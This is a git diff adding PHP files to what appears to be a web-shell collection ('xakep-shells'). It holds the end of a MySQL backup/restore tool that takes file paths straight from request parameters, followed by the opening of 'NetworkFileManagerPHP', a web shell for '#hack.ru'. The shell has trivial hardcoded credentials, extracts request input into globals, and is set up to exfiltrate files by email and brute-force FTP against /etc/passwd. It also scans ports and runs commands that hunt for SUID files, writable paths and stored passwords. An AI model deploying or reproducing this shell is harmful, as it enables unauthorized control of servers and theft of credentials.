+                    <div align="center">The backup process has now started<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        
+    }
+
+    function do_backup() {
+        global $HTTP_GET_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $data = unserialize(base64_decode($HTTP_GET_VARS['data']));
+        $filename = $HTTP_GET_VARS['file'];
+
+        $timedout = 0;
+        $dump = '';
+
+        foreach ($data as $table => $line) 
+        {
+            if (!$this->timeout()) 
+            {
+            	$returned = $this->backup_table($table, $line);
+
+                if (is_array($returned)) 
+                {
+                	$timedout = 1;
+                    $dump .= $returned[0];
+                    $data[ $table ] = $returned[1];
+                }
+                else 
+                {
+                    $dump .= $returned;
+                	unset($data[ $table ]);
+                }
+            }
+            else 
+            {
+            	$timedout = 1;
+            }
+        }
+
+        if (!$fp = fopen($filename, 'ab')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$dump);
+        fclose($fp);
+
+        if ($timedout) 
+        {
+            $data = base64_encode(serialize($data));
+            $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+            $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">The backup process is in progress<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The backup progress has finished and the file has been written to "$filename".<br /><br />
+                    <a href="$filename">Click here to download the file</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+    }
+
+    function backup_table($table,$start) {
+        $dump = '';
+
+        if (!$start) 
+        {
+            $result = mysql_query('SHOW FIELDS FROM '.$table);
+
+            while ($field = mysql_fetch_assoc($result)) 
+            {
+                if (!$field['Null']) 
+                {
+                    $null = ' NOT NULL default "'.$field['Default'].'"';
+                }
+                else 
+                {
+                    $null = '';
+                }
+
+                if ($field['Extra']) 
+                {
+                    $field['Extra'] = ' '.$field['Extra'];
+                }
+
+                $field_row[] = '  ' . $field['Field'] . ' ' . $field['Type'] . $null . $field['Extra'];
+            }
+
+            $result = mysql_query('SHOW KEYS FROM '.$table);
+
+            while ($key = mysql_fetch_assoc($result)) 
+            {
+                if ($key['Key_name'] == 'PRIMARY') 
+                {
+                    $primary_key = $key['Column_name'];
+                }
+                else 
+                {
+                    $unique[ $key['Key_name'] ][] = $key['Column_name'];
+                }
+            }
+
+            if (isset($primary_key)) 
+            {
+                $field_row[] = '  PRIMARY KEY (' . $primary_key . ')';
+            }
+
+            if (isset($unique))
+            {
+                foreach ($unique as $name => $keys) 
+                {
+                    $field_row[] = '  UNIQUE ' . $name . ' (' . implode(',',$keys) . ')';
+                }
+            }
+
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Table structure for table '$table'\n";
+            $dump .= "--\n\n";
+            $dump .= "CREATE TABLE $table (\n";
+            $dump .= implode(",\n",$field_row);
+            $dump .= "\n);\n\n";
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Dumping data for table '$table'\n";
+            $dump .= "--\n\n";
+        }
+
+
+        //
+        // Records
+        //
+
+        $done = 0;
+        $result = mysql_query('SELECT * FROM '.$table.' LIMIT '.$start.',-1');
+
+        while ($row = mysql_fetch_row($result)) 
+        {
+            if ($this->timeout()) 
+            {
+             	return array($dump,$done);
+            }
+
+            $done++;
+
+            foreach ($row as $id => $value) 
+            {
+                $value = str_replace('"','\\"',$value);
+                $row[$id] = '"'.$value.'"';
+
+            }
+
+        	$dump .= 'INSERT INTO ' . $table . ' VALUES (' . implode(',',$row) . ");\n";
+        }
+
+        return $dump;
+    }
+
+
+    function main() {
+        if (!$this->link) 
+        {
+            if (!$this->read_db_details()) 
+            {
+                return $this->set_database();
+            }
+
+            if ($error_text = $this->connect(1)) 
+            {
+                return $this->set_database($error_text);            	
+            }        
+        }
+
+
+        $tables_to_backup = '';
+
+        if ($this->db['prefix']) 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="prefix" checked="checked" />IPB Tables Only <br />';
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" />All<br />';
+        }
+        else 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" checked="checked" />All<br />';        	
+        }
+
+        $tables = mysql_list_tables($this->db['name']);
+
+        $options = '';
+        while (list($table_name) = mysql_fetch_array($tables)) 
+        {
+           $options .= '<option value="'.$table_name.'">'.$table_name.'</option>';
+        }
+
+        $tables_to_backup .= <<<HTML
+<input type="radio" name="tables" value="selected" />Selected tables:<br />
+<div style="margin-left: 40px">
+    <select name="table_select[]" class="textbox" size="5" style="width: 250px" multiple="multiple">
+$options
+    </select>
+</div>
+HTML;
+
+
+        $options = '';
+        if ($dir = @opendir('./')) 
+        {
+            while ($file = readdir($dir)) 
+            {
+                $temp = strtolower($file);
+
+                if ($file != '.' && $file != '..' && strpos($temp, '.sql')) 
+                {
+                    $options .= '<option value="'.$file.'">'.$file.'</option>';
+                } 
+            }  
+            closedir($dir);
+        }
+        $restore_files = '<select name="filename" class="textbox">'.$options.'</select>';
+
+        $restore_files .= '<br /><br /><u>or</u> path:<br /><br /><input type="text" name="relfilename" class="textbox" />';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Selected Database Details</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1"><strong>Host / Port</strong></td>
+                <td width="300" class="tdrow2">{$this->db['host']}:{$this->db['port']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2">{$this->db['name']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2">{$this->db['user']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">[ <a href="mysql_tool.php?act=change_db">Change Database</a> ]</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+<br /><br />
+    <form method="post" action="mysql_tool.php?act=backup">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Backup Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>Tables to backup:</strong></td>
+                <td width="300" class="tdrow2">$tables_to_backup</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Filename</strong></td>
+                <td class="tdrow2"><input type="text" name="filename" class="textbox" value="sql_backup.sql"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Backup"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+        <br /><br />
+    <form method="post" action="mysql_tool.php?act=restore">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Restore Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>SQL File to restore:</strong></td>
+                <td width="300" class="tdrow2">$restore_files</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Restore"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function restore() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $filename = $HTTP_POST_VARS['filename'];
+        $relfilename = $HTTP_POST_VARS['relfilename'];
+
+        if ($relfilename) 
+        {
+        	$filename = $relfilename;
+        }
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename);
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Confirm Restoration</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <strong>Are you sure you want to restore the SQL file?</strong><br /><br />
+                    <a href="$url">Click here to restore "$filename" to "{$this->db['name']}"</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+
+    function do_restore() {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+        $this->read_db_details();
+        $this->connect();
+
+        $filesize       = filesize($filename);
+        $file_position  = isset($HTTP_GET_VARS['pos']) ? $HTTP_GET_VARS['pos'] : 0;
+        $errors         = isset($HTTP_GET_VARS['ignore_errors']) ? 0 : 1;
+
+        if (!$fp = fopen($filename,'rb')) 
+        {
+        	return $this->error('Unable to open file "'.$filename.'"');
+        }
+
+        $buffer = '';
+        $inside_quote = 0;
+        $quote_inside = '';
+        $started_query = 0;
+
+        $data_buffer = '';
+
+        $last_char = "\n";
+
+        // Sets file position indicator
+        fseek($fp,$file_position);
+
+        while ((!feof($fp) || strlen($buffer)) && !$this->timeout()) 
+        {
+            do 
+            {
+                // Deals with the length of the buffer
+                if (!strlen($buffer)) 
+                {
+                    $buffer .= fread ($fp,1024);
+                }
+
+                // Fiddle around with the buffers
+                $current_char = $buffer[0];
+                $buffer = substr($buffer, 1);
+
+
+                if ($started_query)
+                {
+                    $data_buffer .= $current_char;
+                } 
+                elseif (preg_match("/[A-Za-z]/i",$current_char) && $last_char == "\n") 
+                {
+                    $started_query = 1;
+                    $data_buffer = $current_char;
+                } 
+                else 
+                {
+                    $last_char = $current_char;
+                }
+            } while (!$started_query && (!feof($fp) || strlen($buffer)));
+
+
+            if ($inside_quote && $current_char == $quote_inside && $last_char != '\\') 
+            {
+                // We were inside a quote but now we aren't so reset the flag and carry on
+                $inside_quote = 0;
+            } 
+            elseif ($current_char == '\\' && $last_char == '\\')
+            {
+                $current_char = '';	
+            } 
+            elseif (!$inside_quote && ($current_char == '"' || $current_char == '`' || $current_char == '\''))
+            {
+                // We have just entered a new quote
+                $inside_quote = 1;
+                $quote_inside = $current_char;
+            } 
+            elseif (!$inside_quote && $current_char == ';') 
+            {
+                // End of query so execute query, clear data buffer and advance counter
+                mysql_query($data_buffer);
+
+                if ($errors && mysql_errno())
+                {
+                    $new_position = ftell($fp) - strlen($buffer);
+                    return $this->restore_error($data_buffer, $new_position);
+                }
+
+
+                $data_buffer = '';
+                $last_char = "\n";
+                $started_query = 0;
+            }
+
+            $last_char = $current_char;
+        }
+
+
+        $new_position = ftell($fp) - strlen($buffer) - strlen($data_buffer);
+
+        if (feof($fp)) 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restoration Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The restore progress has finished.
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$new_position;
+
+            if (!$errors) 
+            {
+            	$url .= '&ignore_errors=1';
+            }
+
+            $process = floor(($new_position / $filesize) * 100);
+
+            $this->meta = '<meta http-equiv="refresh" content="5; url='.$url.'">';
+            $this->title = $process.'% Complete';
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restore in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>Restoration is <b>$process%</b> complete.</strong>
+                        <br /><br />
+                        Please await the process of the next batch.
+                        <br /><br />
+                        <a href="$url">Click here if you are not redirected</a>
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+        fclose($fp);
+       
+    }
+
+    function restore_error($query, $position) {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$position;
+
+        $mysql_error = mysql_error();
+
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="600">
+        <tr>
+          <td align="center" class="title">Query Failed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>An error occurred due to an invalid query</strong>
+                        <br /><br />
+                        Query Executed: $query
+                        <br />
+                        MySQL Returned: $mysql_error
+                        <br /><br />
+                        <a href="$url">Continue restore process</a><br />
+                        <a href="{$url}&ignore_errors=1">Continue ignoring all further errors</a><br />
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+    
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/network.php.php.txt b/xakep-shells/PHP/network.php.php.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/xakep-shells/PHP/network.php.php.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
